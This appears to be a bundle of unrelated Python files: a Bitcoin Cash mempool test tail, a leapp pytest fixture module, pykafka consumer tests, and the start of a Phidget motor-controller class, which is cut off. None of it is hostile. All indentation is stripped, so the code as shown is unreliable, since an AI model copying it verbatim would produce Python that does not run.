# only a max of 10K bytes in the pool and node3 up to 20K bytes in the pool, where as, Nodes 1 and 2 will
# have allowed all transactions into their mempools.
waitFor(30, lambda: self.nodes[0].getmempoolinfo()["size"] == 100)
waitFor(30, lambda: self.nodes[0].getmempoolinfo()["bytes"] > 20000)
waitFor(30, lambda: self.nodes[1].getmempoolinfo()["size"] == 100)
waitFor(30, lambda: self.nodes[1].getmempoolinfo()["bytes"] > 20000)
waitFor(30, lambda: (self.nodes[2].getmempoolinfo()["size"] >= 43) and (self.nodes[2].getmempoolinfo()["size"] <= 45))
waitFor(30, lambda: self.nodes[2].getmempoolinfo()["bytes"] < 11000)
waitFor(30, lambda: self.nodes[2].getmempoolinfo()["bytes"] > 9750)
waitFor(30, lambda: [print("Node 3 mempool, expecting 87: %s" % str(self.nodes[3].getmempoolinfo())), (self.nodes[3].getmempoolinfo()["size"] >= 86) and (self.nodes[3].getmempoolinfo()["size"] <= 90)][-1])
waitFor(30, lambda: self.nodes[3].getmempoolinfo()["bytes"] < 22000)
waitFor(30, lambda: self.nodes[3].getmempoolinfo()["bytes"] > 19500)
# stop and start all nodes with mempool persist off and limitfreerelay off but increase the minlimitertxfee to a high
# value. This will test the forced reaccepting of wallet transactions even though free transactions are not accepted.
# Only the node which had txns sent to its wallet should have its txns reaccepted.
stop_nodes(self.nodes)
wait_bitcoinds()
self.nodes = start_nodes(4, self.options.tmpdir, [["-minlimitertxfee=10.0", "-limitfreerelay=0", "-persistmempool=0"], ["-minlimitertxfee=1.0", "-limitfreerelay=0", "-persistmempool=0"], ["-minlimitertxfee=2.0", "-limitfreerelay=0", "-persistmempool=0"], ["-minlimitertxfee=3.0", "-limitfreerelay=0", "-persistmempool=0"]])
interconnect_nodes(self.nodes)
waitFor(30, lambda: self.nodes[0].getmempoolinfo()["size"] == 100)
waitFor(30, lambda: self.nodes[0].getmempoolinfo()["bytes"] > 20000)
waitFor(30, lambda: self.nodes[1].getmempoolinfo()["size"] == 0)
waitFor(30, lambda: self.nodes[1].getmempoolinfo()["bytes"] == 0)
waitFor(30, lambda: self.nodes[2].getmempoolinfo()["size"] == 0)
waitFor(30, lambda: self.nodes[2].getmempoolinfo()["bytes"] == 0)
waitFor(30, lambda: self.nodes[2].getmempoolinfo()["bytes"] == 0)
waitFor(30, lambda: self.nodes[3].getmempoolinfo()["size"] == 0)
waitFor(30, lambda: self.nodes[3].getmempoolinfo()["bytes"] == 0)
waitFor(30, lambda: self.nodes[3].getmempoolinfo()["bytes"] == 0)
if __name__ == '__main__':
env = os.getenv("BITCOIND", None)
path = None
if env is None:
for arg in sys.argv:
if "srcdir" in arg:
path = arg.split("=")[1]
break
if path is None:
env = os.path.dirname(os.path.abspath(__file__))
env = env + os.sep + ".." + os.sep + ".." + os.sep + "src" + os.sep + "bitcoind"
env = os.path.abspath(env)
if path is None:
path = os.path.dirname(env)
try:
cashlib.init(path + os.sep + ".libs" + os.sep + "libbitcoincash.so")
BitcoinCli = os.getenv("BITCOINCLI", path + os.sep + "bitcoin-cli")
MyTest().main()
except OSError as e:
print("Issue loading shared library. This is expected during cross compilation since the native python will not load the .so: %s" % str(e))
# Create a convenient function for an interactive python debugging session
def Test():
global BitcoinCli
t = MyTest(True)
t.drop_to_pdb = True
bitcoinConf = {
"debug": ["blk", "mempool", "net", "req"],
"blockprioritysize": 2000000, # we don't want any transactions rejected due to insufficient fees...
"net.ignoreTimeouts": 1,
"logtimemicros": 1
}
# you may want these flags:
flags = ["--nocleanup", "--noshutdown"]
# Execution is much faster if a ramdisk is used, so use it if one exists in a typical location
if os.path.isdir("/ramdisk/test"):
flags.append("--tmpdir=/ramdisk/test/ma")
# Out-of-source builds are awkward to start because they need an additional flag
# automatically add this flag during testing for common out-of-source locations
binpath = findBitcoind()
flags.append("--srcdir=%s" % binpath)
# load the cashlib.so from our build directory
cashlib.init(binpath + os.sep + ".libs" + os.sep + "libbitcoincash.so")
BitcoinCli = os.getenv("BITCOINCLI", binpath + os.sep + "bitcoin-cli")
# start the test
t.main(flags, bitcoinConf, None)
|
fixture.py
|
import os
import socket
import sys
import types
import uuid
from multiprocessing import Process, Queue
import pytest
from _pytest.python import pytest_pyfunc_call as original_pytest_pyfunc_call
from leapp.compat import raise_with_traceback
from leapp.messaging.inprocess import InProcessMessaging
from leapp.repository.scan import find_and_scan_repositories
from leapp.utils import get_api_models
from leapp.utils.audit import Execution, get_connection
from leapp.utils.repository import find_repository_basedir
PY27 = sys.version_info[:2] == (2, 7)
PY36 = sys.version_info[:2] == (3, 6)
PY38 = sys.version_info[:2] == (3, 8)
HIGHER = sys.version_info[:2] > (3, 8)
def _patched_name_py27(code, name):
return types.CodeType(
code.co_argcount,
code.co_nlocals,
code.co_stacksize,
code.co_flags,
code.co_code,
code.co_consts,
code.co_names,
code.co_varnames,
code.co_filename,
name,
code.co_firstlineno,
code.co_lnotab,
code.co_freevars,
code.co_cellvars,
)
def _patched_name_py36(code, name):
return types.CodeType(
code.co_argcount,
code.co_kwonlyargcount,
code.co_nlocals,
code.co_stacksize,
code.co_flags,
code.co_code,
code.co_consts,
code.co_names,
code.co_varnames,
code.co_filename,
name,
code.co_firstlineno,
code.co_lnotab,
code.co_freevars,
code.co_cellvars,
)
def _patched_name_py38(code, name):
code.replace(co_name=name)
return code
def _tb_pack(tb):
result = []
while tb is not None:
code = tb.tb_frame.f_code
result.append((code.co_filename, tb.tb_lineno, code.co_name))
tb = tb.tb_next
return result
def _tb_unpack(packed):
previous = '_e'
globs = {previous: StopIteration}
for i, (filename, lineno, name) in enumerate(reversed(packed)):
current = '_%d' % i
eval(compile( # noqa; pylint: disable=eval-used
'%sdef %s(): raise %s()' % ('\n' * (lineno - 1), current, previous), filename, 'exec'), globs)
previous = current
func = globs[current]
if PY27:
func.func_code = _patched_name_py27(func.func_code, name)
elif PY36:
func.__code__ = _patched_name_py36(func.__code__, name)
elif PY38 or HIGHER:
func.__code__ = _patched_name_py38(func.__code__, name)
else:
raise NotImplementedError(
"Traceback forwarding is not implemented for your"
" Python version. Currently supported 2.7, 3.6, 3.8"
" and higher"
)
try:
globs[previous]()
except StopIteration:
globs.clear()
return sys.exc_info()[2].tb_next
class ActorContext(object):
"""
ActorContext is a helper class for testing actors. It helps to eliminate the boilerplate for executing
actors. It provides a set of methods that allow specifying input messages for the actor, executing the
actor and to retrieve messages sent by the actor.
"""
apis = ()
def __init__(self, actor=None):
self._actor = actor
self._messaging = InProcessMessaging()
def set_actor(self, actor):
"""
Internally used method to set the current actor specification object to setup the current actor for the
test function.
:param actor: ActorSpecification instance to use.
:return: None
"""
type(self).name = actor.name + '_feeder'
# Consumes is here what it actually produces because we want to consume produced messages in 'consume'
type(self).consumes = get_api_models(actor, 'produces')
self._actor = actor
def feed(self, *models):
"""
Feed the messaging model with messages to be available to consume.
:param models: Data in form of model instances to be available for the actor to consume.
:type models: Variable number of instances of classes derived from :py:class:`leapp.models.Model`
:return: None
"""
for model in models:
self._messaging.feed(model, self)
def run(self, config_model=None):
"""
Execute the current actor.
:param config_model: Config model for the actor to consume.
:type config_model: Config model instance derived from :py:class:`leapp.models.Model`
:return: None
"""
config_model_cls = config_model.__class__ if config_model else None
if config_model:
self._messaging.feed(config_model, self)
# we have to make messaging system aware of config model being used as this is normally done by workflow
self._messaging._config_models = (config_model_cls,)
# the same as above applies here for actor
self._actor(messaging=self._messaging, config_model=config_model_cls).run()
def messages(self):
"""
Returns raw messages produced by the actor.
:return: list of raw message data dictionaries.
"""
return self._messaging.messages()
def consume(self, *models):
"""
Retrieve messages produced by the actor execution and specified in the actors :py:attr:`produces`
attribute, and filter message types by models.
:param models: Models to use as a filter for the messages to return
:type models: Variable number of the derived classes from :py:class:`leapp.models.Model`
:return:
"""
return tuple(self._messaging.consume(self, *models))
@pytest.fixture(scope='module')
def loaded_leapp_repository(request):
"""
This fixture will ensure that the repository for the current test run is loaded with all its links etc.
This enables running actors and using models, tags, topics, workflows etc.
Additionally loaded_leapp_repository gives you access to a :py:class:`leapp.repository.manager.RepositoryManager`
instance.
:Example:
.. code-block:: python
from leapp.snactor.fixture import loaded_leapp_repository
from leapp.models import ExampleModel, ProcessedExampleModel
def my_repository_library_test(loaded_leapp_repository):
from leapp.libraries.common import global
e = ExampleModel(value='Some string')
result = global.process_function(e)
assert type(result) is ProcessedExampleModel
"""
repository_path = find_repository_basedir(request.module.__file__)
os.environ['LEAPP_CONFIG'] = os.path.join(repository_path, '.leapp', 'leapp.conf')
os.environ['LEAPP_HOSTNAME'] = socket.getfqdn()
context = str(uuid.uuid4())
with get_connection(None):
Execution(context=context, kind='snactor-test-run', configuration='').store()
os.environ["LEAPP_EXECUTION_ID"] = context
manager = getattr(request.session, 'leapp_repository', None)
if not manager:
manager = find_and_scan_repositories(repository_path, include_locals=True)
manager.load(resolve=True)
yield manager
@pytest.fixture(scope='function')
def current_actor_context(loaded_leapp_repository):
"""
This fixture will prepare an environment for the actor the test belongs to, to be safely executable.
current_actor_context Is an instance of :py:class:`leapp.snactor.fixture.ActorContext` and gives access
to its methods for feeding an actor with input data, running the actor, and retrieving messages produced
by the actor during its execution.
:Example:
.. code-block:: python
from leapp.snactor.fixture import current_actor_context
from leapp.models import ConsumedExampleModel, ProducedExampleModel
def test_actor_lib_some_function(current_actor_context):
# Feed with messages to be consumable by the actor that is going to be executed.
current_actor_context.feed(ConsumedExampleModel(value='Some random data'))
# Execute the actor
current_actor_context.run()
# Ensure that at least one message is produced
assert current_actor_context.consume(ProducedExampleModel)
# Ensure the value is what we expect
assert current_actor_context.consume(ProducedExampleModel)[0].value == 42
"""
return type('CurrentActorContext', (ActorContext,), {'repository': loaded_leapp_repository, 'name': None})()
@pytest.fixture(scope='function')
def current_actor_libraries(request, loaded_leapp_repository):
"""
This fixture will make libraries that are private to the actor only available only for the scope of the
test function that uses this fixture.
:Example:
.. code-block:: python
from leapp.snactor.fixture import current_actor_libraries
def test_actor_lib_some_function(current_actor_libraries):
from leapp.libraries.actor import private
assert private.some_function(1) == 42
"""
actor = _get_actor(request.module, loaded_leapp_repository)
with actor.injected_context():
yield actor
def _get_actor(module, repository):
"""
Looks up the current actor based on the module passed. With help of the location of the module where
the tests reside, the actor that is requested can be deduced since the full path of the actor should be
the prefix of the path for the current test module.
:param module: A python module object in which reside the tests for the actor to be run.
:param repository: Instance of a :py:class:`leapp.repository.manager.RepositoryManager`
:return: ActorDefinition instance or None, when the actor could not be found
"""
path = os.path.realpath(module.__file__)
for actor in repository.actors:
if path.startswith(os.path.realpath(actor.full_path) + os.sep):
return actor
return None
@pytest.fixture(scope='module')
def leapp_forked():
pass
def _execute_test(q, pyfuncitem):
"""
This function is called in the child process from pytest_pyfunc_call via multiprocessing.Process.
:param q: A multiprocessing.Queue object to pass data to the parent process
:param pyfuncitem: pytest item describing the current test function
:return: None
"""
try:
if 'current_actor_context' in pyfuncitem.funcargs:
actor = _get_actor(pyfuncitem.module, pyfuncitem.funcargs['current_actor_context'].repository)
pyfuncitem.funcargs['current_actor_context'].set_actor(actor)
original_pytest_pyfunc_call(pyfuncitem=pyfuncitem)
q.put((True, None))
except BaseException: # noqa; pylint: disable=broad-except
# We need this broad exception to catch all errors and pass them through to the parent process
e_type, e_exc, e_tb = sys.exc_info()
q.put((False, (e_type, e_exc, _tb_pack(e_tb))))
if hasattr(pytest, 'hookimpl'):
@pytest.hookimpl(tryfirst=True)
def pytest_pyfunc_call(pyfuncitem):
"""
This function is a hook for pytest implementing the ability to run the actors in tests safely.
It will call :py:func:`leapp.snactor.fixture._execute_test` in a child process if the current test uses the
:py:func:`current_actor_context` fixture. If it doesn't use the :py:func:`current_actor_context` fixture, it
will default to the default `pytest_pyfunc_call` implementation.
"""
if not any([arg in pyfuncitem.funcargs for arg in ('current_actor_context', 'leapp_forked')]):
return None
q = Queue()
p = Process(target=_execute_test, args=(q, pyfuncitem))
p.start()
p.join()
# Ensure we are actually getting a result - Otherwise ensure this is marked as failure
assert not q.empty()
r, e = q.get()
if e:
raise_with_traceback(e[1], _tb_unpack(e[2]))
return r
|
test_simpleconsumer.py
|
from contextlib import contextmanager
import datetime as dt
import json
import mock
import os
import platform
import pytest
import time
import threading
import unittest2
from uuid import uuid4
try:
import gevent
except ImportError:
gevent = None
try:
from pykafka.rdkafka import _rd_kafka # noqa
RDKAFKA = True
except ImportError:
RDKAFKA = False # C extension not built
from pykafka import KafkaClient
from pykafka.simpleconsumer import OwnedPartition, OffsetType
from pykafka.test.utils import get_cluster, stop_cluster
from pykafka.utils.compat import range, iteritems, get_string
kafka_version = os.environ.get('KAFKA_VERSION', '0.8.0')
class TestSimpleConsumer(unittest2.TestCase):
maxDiff = None
USE_RDKAFKA = False
USE_GEVENT = False
@classmethod
def setUpClass(cls):
cls.kafka = get_cluster()
cls.topic_name = uuid4().hex.encode()
cls.kafka.create_topic(cls.topic_name, 3, 2)
cls.total_msgs = 1000
cls.client = KafkaClient(cls.kafka.brokers, broker_version=kafka_version)
cls.prod = cls.client.topics[cls.topic_name].get_producer(
min_queued_messages=1
)
cls.after_earliest = dt.datetime.now() + dt.timedelta(seconds=1)
for i in range(cls.total_msgs):
cls.prod.produce('msg {i}'.format(i=i).encode())
@classmethod
def tearDownClass(cls):
stop_cluster(cls.kafka)
@contextmanager
def _get_simple_consumer(self, **kwargs):
topic = self.client.topics[self.topic_name]
consumer = topic.get_simple_consumer(
use_rdkafka=self.USE_RDKAFKA, **kwargs)
try:
yield consumer
finally:
consumer.stop()
def test_consume(self):
"""Test consuming all messages in topic"""
# This uses a fairly long timeout to allow the test to pass on an
# oversubscribed test cluster
with self._get_simple_consumer(consumer_timeout_ms=30000) as consumer:
count = 0
for msg in consumer:
self.assertIsNotNone(msg.value)
count += 1
if count == self.total_msgs:
# We don't want to wait for StopIteration, given the long
# timeout set above
break
self.assertEquals(count, self.total_msgs)
def test_unblock_event(self):
"""A call to consume() should return when unblock_event is set()
To block consume() method indefinitely, all messages in the topic need to
be consumed and the timeout should be set to -1.
"""
topic = self.client.topics[self.topic_name]
consumer = topic.get_simple_consumer(use_rdkafka=self.USE_RDKAFKA, consumer_timeout_ms=-1)
# Consume all messages in the topic
count = 0
for _ in consumer:
count += 1
if count == self.total_msgs:
break
unblock_event = consumer._cluster.handler.Event()
consume_thread = threading.Thread(target=consumer.consume, kwargs={'unblock_event': unblock_event})
consume_thread.start()
unblock_event.set()
consume_thread.join(30)
self.assertFalse(consume_thread.is_alive())
@staticmethod
def _convert_offsets(offset_responses):
"""Helper function to translate Offset(Fetch)PartitionResponse
Calls like consumer.fetch_offsets() and earliest_available_offsets()
return lists of OffsetPartitionResponses. These hold the next offset
to be consumed, whereas consumer.held_offsets returns the latest
consumed offset. This translates them to facilitate comparisons.
"""
if isinstance(offset_responses, dict):
offset_responses = iteritems(offset_responses)
f1 = lambda off: OffsetType.EARLIEST if off == 0 else off - 1 # noqa
f2 = lambda off: off[0] if isinstance(off, list) else off # noqa
return {partition_id: f1(f2(offset_response.offset))
for partition_id, offset_response in offset_responses}
def test_offset_commit(self):
"""Check fetched offsets match pre-commit internal state"""
with self._get_simple_consumer(
consumer_group=b'test_offset_commit') as consumer:
[consumer.consume() for _ in range(100)]
offsets_committed = consumer.held_offsets
consumer.commit_offsets()
offsets_fetched = self._convert_offsets(consumer.fetch_offsets())
self.assertEquals(offsets_fetched, offsets_committed)
def test_offset_commit_override(self):
"""Check fetched offsets match committed offsets"""
with self._get_simple_consumer(
consumer_group=b'test_offset_commit') as consumer:
[consumer.consume() for _ in range(100)]
offset = 69
offsets_committed = [(p, offset) for p in consumer.partitions.values()]
consumer.commit_offsets(partition_offsets=offsets_committed)
offsets_fetched = self._convert_offsets(consumer.fetch_offsets())
offsets_committed = {p.id: offset - 1 for p in consumer.partitions.values()}
self.assertEquals(offsets_fetched, offsets_committed)
def test_offset_resume(self):
"""Check resumed internal state matches committed offsets"""
with self._get_simple_consumer(
consumer_group=b'test_offset_resume') as consumer:
[consumer.consume() for _ in range(100)]
offsets_committed = consumer.held_offsets
consumer.commit_offsets()
with self._get_simple_consumer(
consumer_group=b'test_offset_resume') as consumer:
self.assertEquals(consumer.held_offsets, offsets_committed)
def test_reset_offset_on_start(self):
"""Try starting from LATEST and EARLIEST offsets"""
with self._get_simple_consumer(
auto_offset_reset=OffsetType.EARLIEST,
reset_offset_on_start=True) as consumer:
earliest_offs = self._convert_offsets(
consumer.topic.earliest_available_offsets())
self.assertEquals(earliest_offs, consumer.held_offsets)
self.assertIsNotNone(consumer.consume())
with self._get_simple_consumer(
auto_offset_reset=OffsetType.LATEST,
reset_offset_on_start=True,
consumer_timeout_ms=500) as consumer:
latest_offs = self._convert_offsets(
consumer.topic.latest_available_offsets())
self.assertEquals(latest_offs, consumer.held_offsets)
self.assertIsNone(consumer.consume(block=False))
difference = sum(latest_offs[i] - earliest_offs[i]
if earliest_offs[i] >= 0 else latest_offs[i] + 1
if latest_offs[i] >= 0 else 0
for i in latest_offs)
self.assertEqual(difference, self.total_msgs)
def test_reset_offsets_timestamp(self):
"""Test resetting to user-provided timestamps"""
with self._get_simple_consumer(
auto_offset_reset=OffsetType.EARLIEST) as consumer:
# Find us a non-empty partition "target_part"
part_id, latest_offset = next(
(p, res.offset[0])
for p, res in consumer.topic.latest_available_offsets().items()
if res.offset[0] > 0)
target_part = consumer.partitions[part_id]
# Set all other partitions to LATEST, to ensure that any consume()
# calls read from target_part
partition_offsets = {
p: OffsetType.LATEST for p in consumer.partitions.values()}
partition_offsets[target_part] = self.after_earliest
consumer.reset_offsets(partition_offsets.items())
# expect EARLIEST here since our test partition has a single log segment
self.assertEqual(consumer.held_offsets[part_id], OffsetType.EARLIEST)
msg = consumer.consume()
self.assertEqual(msg.offset, 0)
def test_reset_offsets(self):
"""Test resetting to user-provided offsets"""
with self._get_simple_consumer(
auto_offset_reset=OffsetType.EARLIEST) as consumer:
# Find us a non-empty partition "target_part"
part_id, latest_offset = next(
(p, res.offset[0])
for p, res in consumer.topic.latest_available_offsets().items()
if res.offset[0] > 0)
target_part = consumer.partitions[part_id]
# Set all other partitions to LATEST, to ensure that any consume()
# calls read from target_part
partition_offsets = {
p: OffsetType.LATEST for p in consumer.partitions.values()}
new_offset = latest_offset - 5
partition_offsets[target_part] = new_offset
consumer.reset_offsets(partition_offsets.items())
self.assertEqual(consumer.held_offsets[part_id], new_offset)
msg = consumer.consume()
self.assertEqual(msg.offset, new_offset + 1)
# Invalid offsets should get overwritten as per auto_offset_reset
partition_offsets[target_part] = latest_offset + 5 # invalid!
consumer.reset_offsets(partition_offsets.items())
# SimpleConsumer's fetcher thread will detect the invalid offset
# and reset it immediately. RdKafkaSimpleConsumer however will
# only get to write the valid offset upon a call to consume():
msg = consumer.consume()
expected_offset = target_part.earliest_available_offset()
self.assertEqual(msg.offset, expected_offset)
self.assertEqual(consumer.held_offsets[part_id], expected_offset)
@pytest.mark.xfail
def test_update_cluster(self):
"""Check that the consumer can initiate cluster updates"""
if self.USE_RDKAFKA:
pytest.skip("Unresolved crashes")
with self._get_simple_consumer() as consumer:
self.assertIsNotNone(consumer.consume())
for broker in self.client.brokers.values():
broker._connection.disconnect()
# The consumer fetcher thread should prompt broker reconnection
t_start = time.time()
timeout = 40. if self.USE_GEVENT else 20.
try:
for broker in self.client.brokers.values():
while not broker._connection.connected:
time.sleep(.1)
self.assertTrue(time.time() - t_start < timeout,
msg="Broker reconnect failed.")
finally:
# Make sure further tests don't get confused
consumer._update()
# If the fetcher thread fell over during the cluster update
# process, we'd get an exception here:
self.assertIsNotNone(consumer.consume())
@pytest.mark.xfail
def test_consumer_lag(self):
"""Ensure that after consuming the entire topic, lag is 0"""
with self._get_simple_consumer(consumer_group=b"test_lag_group",
consumer_timeout_ms=1000) as consumer:
while True:
message = consumer.consume()
if message is None:
break
consumer.commit_offsets()
latest_offsets = {p_id: res.offset[0]
for p_id, res
in iteritems(consumer.topic.latest_available_offsets())}
current_offsets = {p_id: res.offset for p_id, res in consumer.fetch_offsets()}
self.assertEqual(current_offsets, latest_offsets)
@pytest.mark.skipif(platform.python_implementation() == "PyPy" or gevent is None,
reason="Unresolved crashes")
class TestGEventSimpleConsumer(TestSimpleConsumer):
USE_GEVENT = True
class TestOwnedPartition(unittest2.TestCase):
def test_partition_saves_offset(self):
offset = 20
msgval = "test"
partition = mock.MagicMock()
op = OwnedPartition(partition)
op.next_offset = offset
message = mock.Mock()
message.value = msgval
message.offset = offset
op.enqueue_messages([message])
self.assertEqual(op.message_count, 1)
ret_message = op.consume()
self.assertEqual(op.last_offset_consumed, message.offset)
self.assertEqual(op.next_offset, message.offset + 1)
self.assertNotEqual(ret_message, None)
self.assertEqual(ret_message.value, msgval)
def test_partition_rejects_old_message(self):
last_offset = 400
op = OwnedPartition(None)
op.last_offset_consumed = last_offset
message = mock.Mock()
message.value = "test"
message.offset = 20
op.enqueue_messages([message])
self.assertEqual(op.message_count, 0)
op.consume()
self.assertEqual(op.last_offset_consumed, last_offset)
def test_compacted_topic_partition_rejects_old_message_after_initial(self):
last_offset = 400
message1 = mock.Mock()
message1.value = "first-test"
message1.partition_id = 0
message1.offset = last_offset
partition = mock.MagicMock()
partition.id = 0
op = OwnedPartition(partition, compacted_topic=True)
op.enqueue_messages([message1])
self.assertEqual(op.message_count, 1)
op.consume()
self.assertEqual(op.message_count, 0)
self.assertEqual(op.last_offset_consumed, last_offset)
message2 = mock.Mock()
message2.value = "test"
message2.partition_id = 0
message2.offset = 20
op.enqueue_messages([message2])
self.assertEqual(op.message_count, 0)
op.consume()
self.assertEqual(op.last_offset_consumed, last_offset)
def test_partition_consume_empty_queue(self):
op = OwnedPartition(None)
message = op.consume()
self.assertEqual(message, None)
def test_partition_offset_commit_request(self):
topic = mock.Mock()
topic.name = "test_topic"
partition = mock.Mock()
partition.topic = topic
partition.id = 12345
op = OwnedPartition(partition)
op.last_offset_consumed = 200
request = op.build_offset_commit_request()
self.assertEqual(request.topic_name, topic.name)
self.assertEqual(request.partition_id, partition.id)
self.assertEqual(request.offset, op.last_offset_consumed + 1)
parsed_metadata = json.loads(get_string(request.metadata))
self.assertEqual(parsed_metadata["consumer_id"], '')
self.assertTrue(bool(parsed_metadata["hostname"]))
def test_partition_offset_fetch_request(self):
topic = mock.Mock()
topic.name = "test_topic"
partition = mock.Mock()
partition.topic = topic
partition.id = 12345
op = OwnedPartition(partition)
request = op.build_offset_fetch_request()
self.assertEqual(request.topic_name, topic.name)
self.assertEqual(request.partition_id, partition.id)
def test_partition_offset_counters(self):
res = mock.Mock()
res.offset = 400
op = OwnedPartition(None)
op.set_offset(res.offset)
self.assertEqual(op.last_offset_consumed, res.offset)
self.assertEqual(op.next_offset, res.offset + 1)
if __name__ == "__main__":
unittest2.main()
|
PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class.py
|
# -*- coding: utf-8 -*-
'''
Reuben Brewer, Ph.D.
reuben.brewer@gmail.com
www.reubotics.com
Apache 2 License
Software Revision D, 11/12/2021
Verified working on: Python 2.7, 3.8 for Windows 8.1, 10 64-bit and Raspberry Pi Buster (no Mac testing yet).
'''
__author__ = 'reuben.brewer'
from LowPassFilter_ReubenPython2and3Class import *
import os, sys, platform
import time, datetime
import math
import collections
import inspect #To enable 'TellWhichFileWereIn'
import threading
import traceback
###############
if sys.version_info[0] < 3:
from Tkinter import * #Python 2
import tkFont
import ttk
else:
from tkinter import * #Python 3
import tkinter.font as tkFont #Python 3
from tkinter import ttk
###############
###############
if sys.version_info[0] < 3:
import Queue # Python 2
else:
import queue as Queue # Python 3
###############
###############
if sys.version_info[0] < 3:
from builtins import raw_input as input
else:
from future.builtins import input as input
############### #"sudo pip3 install future" (Python 3) AND "sudo pip install future" (Python 2)
###########################################################
###########################################################
#To install Phidget22, enter folder "Phidget22Python_1.0.0.20190107\Phidget22Python" and type "python setup.py install"
from Phidget22.PhidgetException import *
from Phidget22.Phidget import *
from Phidget22.Devices.Log import *
from Phidget22.LogLevel import *
from Phidget22.Devices.TemperatureSensor import *
from Phidget22.Devices.BLDCMotor import *
from Phidget22.Devices.MotorPositionController import *
###########################################################
###########################################################
#http://stackoverflow.com/questions/19087515/subclassing-tkinter-to-create-a-custom-widget
class PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class(Frame): #Subclass the Tkinter Frame
##########################################################################################################
##########################################################################################################
def __init__(self, setup_dict):
print("#################### PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ starting. ####################")
self.EXIT_PROGRAM_FLAG = 0
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = -1
self.EnableInternal_MyPrint_Flag = 0
self.ThisIsFirstTimeEverAttachingFlag = 1
self.device_connected_flag = 0
self.MainThread_still_running_flag = 0
##########################################
##########################################
if platform.system() == "Linux":
if "raspberrypi" in platform.uname(): #os.uname() doesn't work in windows
self.my_platform = "pi"
else:
self.my_platform = "linux"
elif platform.system() == "Windows":
self.my_platform = "windows"
elif platform.system() == "Darwin":
self.my_platform = "mac"
else:
self.my_platform = "other"
print("The OS platform is: " + self.my_platform)
##########################################
##########################################
##########################################
##########################################
if "GUIparametersDict" in setup_dict:
self.GUIparametersDict = setup_dict["GUIparametersDict"]
##########################################
if "USE_GUI_FLAG" in self.GUIparametersDict:
self.USE_GUI_FLAG = self.PassThrough0and1values_ExitProgramOtherwise("USE_GUI_FLAG", self.GUIparametersDict["USE_GUI_FLAG"])
else:
self.USE_GUI_FLAG = 0
print("USE_GUI_FLAG = " + str(self.USE_GUI_FLAG))
##########################################
##########################################
if "root" in self.GUIparametersDict:
self.root = self.GUIparametersDict["root"]
self.RootIsOwnedExternallyFlag = 1
else:
self.root = None
self.RootIsOwnedExternallyFlag = 0
print("RootIsOwnedExternallyFlag = " + str(self.RootIsOwnedExternallyFlag))
##########################################
##########################################
if "GUI_RootAfterCallbackInterval_Milliseconds" in self.GUIparametersDict:
self.GUI_RootAfterCallbackInterval_Milliseconds = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("GUI_RootAfterCallbackInterval_Milliseconds", self.GUIparametersDict["GUI_RootAfterCallbackInterval_Milliseconds"], 0.0, 1000.0))
else:
self.GUI_RootAfterCallbackInterval_Milliseconds = 30
print("GUI_RootAfterCallbackInterval_Milliseconds = " + str(self.GUI_RootAfterCallbackInterval_Milliseconds))
##########################################
##########################################
if "EnableInternal_MyPrint_Flag" in self.GUIparametersDict:
self.EnableInternal_MyPrint_Flag = self.PassThrough0and1values_ExitProgramOtherwise("EnableInternal_MyPrint_Flag", self.GUIparametersDict["EnableInternal_MyPrint_Flag"])
else:
self.EnableInternal_MyPrint_Flag = 0
print("EnableInternal_MyPrint_Flag: " + str(self.EnableInternal_MyPrint_Flag))
##########################################
##########################################
if "PrintToConsoleFlag" in self.GUIparametersDict:
self.PrintToConsoleFlag = self.PassThrough0and1values_ExitProgramOtherwise("PrintToConsoleFlag", self.GUIparametersDict["PrintToConsoleFlag"])
else:
self.PrintToConsoleFlag = 1
print("PrintToConsoleFlag: " + str(self.PrintToConsoleFlag))
##########################################
##########################################
if "NumberOfPrintLines" in self.GUIparametersDict:
self.NumberOfPrintLines = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("NumberOfPrintLines", self.GUIparametersDict["NumberOfPrintLines"], 0.0, 50.0))
else:
self.NumberOfPrintLines = 10
print("NumberOfPrintLines = " + str(self.NumberOfPrintLines))
##########################################
##########################################
if "UseBorderAroundThisGuiObjectFlag" in self.GUIparametersDict:
self.UseBorderAroundThisGuiObjectFlag = self.PassThrough0and1values_ExitProgramOtherwise("UseBorderAroundThisGuiObjectFlag", self.GUIparametersDict["UseBorderAroundThisGuiObjectFlag"])
else:
self.UseBorderAroundThisGuiObjectFlag = 0
print("UseBorderAroundThisGuiObjectFlag: " + str(self.UseBorderAroundThisGuiObjectFlag))
##########################################
##########################################
if "GUI_ROW" in self.GUIparametersDict:
self.GUI_ROW = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("GUI_ROW", self.GUIparametersDict["GUI_ROW"], 0.0, 1000.0))
else:
self.GUI_ROW = 0
print("GUI_ROW = " + str(self.GUI_ROW))
##########################################
##########################################
if "GUI_COLUMN" in self.GUIparametersDict:
self.GUI_COLUMN = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("GUI_COLUMN", self.GUIparametersDict["GUI_COLUMN"], 0.0, 1000.0))
else:
self.GUI_COLUMN = 0
print("GUI_COLUMN = " + str(self.GUI_COLUMN))
##########################################
##########################################
if "GUI_PADX" in self.GUIparametersDict:
self.GUI_PADX = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("GUI_PADX", self.GUIparametersDict["GUI_PADX"], 0.0, 1000.0))
else:
self.GUI_PADX = 0
print("GUI_PADX = " + str(self.GUI_PADX))
##########################################
##########################################
if "GUI_PADY" in self.GUIparametersDict:
self.GUI_PADY = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("GUI_PADY", self.GUIparametersDict["GUI_PADY"], 0.0, 1000.0))
else:
self.GUI_PADY = 0
print("GUI_PADY = " + str(self.GUI_PADY))
##########################################
##########################################
if "GUI_ROWSPAN" in self.GUIparametersDict:
self.GUI_ROWSPAN = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("GUI_ROWSPAN", self.GUIparametersDict["GUI_ROWSPAN"], 0.0, 1000.0))
else:
self.GUI_ROWSPAN = 0
print("GUI_ROWSPAN = " + str(self.GUI_ROWSPAN))
##########################################
##########################################
if "GUI_COLUMNSPAN" in self.GUIparametersDict:
self.GUI_COLUMNSPAN = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("GUI_COLUMNSPAN", self.GUIparametersDict["GUI_COLUMNSPAN"], 0.0, 1000.0))
